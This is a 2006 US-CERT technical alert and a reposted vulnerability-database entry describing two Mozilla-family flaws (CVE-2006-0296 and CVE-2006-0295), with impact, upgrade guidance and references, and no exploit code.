     * Mozilla web browser, email and newsgroup client
     * Mozilla SeaMonkey
     * Firefox web browser
     * Thunderbird email client


Overview

   Several vulnerabilities exist in the Mozilla web browser and derived
   products, the most serious of which could allow a remote attacker to
   execute arbitrary code on an affected system.


I. Description

   Several vulnerabilities have been reported in the Mozilla web browser
   and derived products. More detailed information is available in the
   individual vulnerability notes, including:


   VU#592425 - Mozilla-based products fail to validate user input to the
   attribute name in "XULDocument.persist"

   A vulnerability in some Mozilla products that could allow a remote
   attacker to execute Javascript commands with the permissions of the
   user running the affected application.
   (CVE-2006-0296)


   VU#759273 - Mozilla QueryInterface memory corruption vulnerability

   Mozilla Firefox web browser and Thunderbird mail client contain a
   memory corruption vulnerability that may allow a remote attacker to
   execute arbitrary code.
   (CVE-2006-0295)


II. Impact

   The most severe impact of these vulnerabilities could allow a remote
   attacker to execute arbitrary code with the privileges of the user
   running the affected application. Other impacts include a denial of
   service or local information disclosure.


III. Solution

Upgrade

   Upgrade to Mozilla Firefox 1.5.0.1 or SeaMonkey 1.0.
   For Mozilla-based products that have no updates available, users are
   strongly encouraged to disable JavaScript.


Appendix A. References

     * Mozilla Foundation Security Advisories -
       <http://www.mozilla.org/security/announce/>

     * Mozilla Foundation Security Advisories -
       <http://www.mozilla.org/projects/security/known-vulnerabilities.ht
       ml>

     * US-CERT Vulnerability Note VU#592425 -
       <http://www.kb.cert.org/vuls/id/592425>

     * US-CERT Vulnerability Note VU#759273 -
       <http://www.kb.cert.org/vuls/id/759273>

     * US-CERT Vulnerability Notes Related to February Mozilla Security
       Advisories -
       <http://www.kb.cert.org/vuls/byid?searchview&query=mozilla_feb_200
       6>

     * US-CERT Vulnerability Note VU#604745 -
       <http://www.kb.cert.org/vuls/id/604745>

     * CVE-2006-0296 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0296>

     * CVE-2006-0295 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0295>

     * Firefox - Rediscover the Web - <http://www.mozilla.com/firefox/>

     * The SeaMonkey Project -
       <http://www.mozilla.org/projects/seamonkey/>

 ____________________________________________________________________

   The most recent version of this document can be found at:

     <http://www.us-cert.gov/cas/techalerts/TA06-038A.html>
 ____________________________________________________________________

   Feedback can be directed to US-CERT Technical Staff. Please send
   email to <cert@cert.org> with "TA06-038A Feedback VU#592425" in the
   subject.
 ____________________________________________________________________

   For instructions on subscribing to or unsubscribing from this
   mailing list, visit <http://www.us-cert.gov/cas/signup.html>.
 ____________________________________________________________________

   Produced 2006 by US-CERT, a government organization.

   Terms of use:

     <http://www.us-cert.gov/legal.html>
 ____________________________________________________________________


Revision History

   Feb 7, 2006: Initial release




-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iQEVAwUBQ+jqRn0pj593lg50AQLZBQf9Hm+BCzOd/iwaoQVyudnE8ut/m+s/xgeG
10b2mpig57dPaSKsq9EpOitFIdHmvFha85OkAz9lfxTprrGm9kjw1lYlSH8idIst
Oq4oXwpPOcwVpOY/OoVeAyGSuOdmeGl1CsMSczD10XbmWOyPf6NBnR/e8U0Vebeu
GglhyODY/eKjbQ6bvDz19t76F5FwiDYKsMpo6CrEMhJWYwQXw3I4O1c9A2/t4OUP
N7+ZShp5/Cql919Nhl3InYMnlNiOeQLxm45PYfXKwW0r4HCM/Rq/SEKsmuDOYtA/
01gBu67urEw63Z0xbjoVJL/RW+5cavYS+gNbCZmaDNbR9WJP04k2PQ==
=snvO
-----END PGP SIGNATURE-----
    

- 漏洞信息

22893
Mozilla Multiple Products Location/Navigation Objects QueryInterface Memory Corruption
Local / Remote, Context Dependent Input Manipulation
Loss of Integrity Upgrade
Exploit Public, Exploit Commercial Vendor Verified, Vendor Verified, Coordinated Disclosure

- 漏洞描述

A memory corruption flaw exists in Mozilla products. The QueryInterface method of the built-in Location and Navigator objects fails to validate input data resulting in memory corruption. With a specially crafted web page or email, a context-dependent attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2006-02-01 Unknow
2006-02-02 2006-02-01

- 解决方案

Upgrade to Firefox 1.5.0.1, Thunderbird 1.5.0.2, or SeaMonkey 1.0 or higher, as they have been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站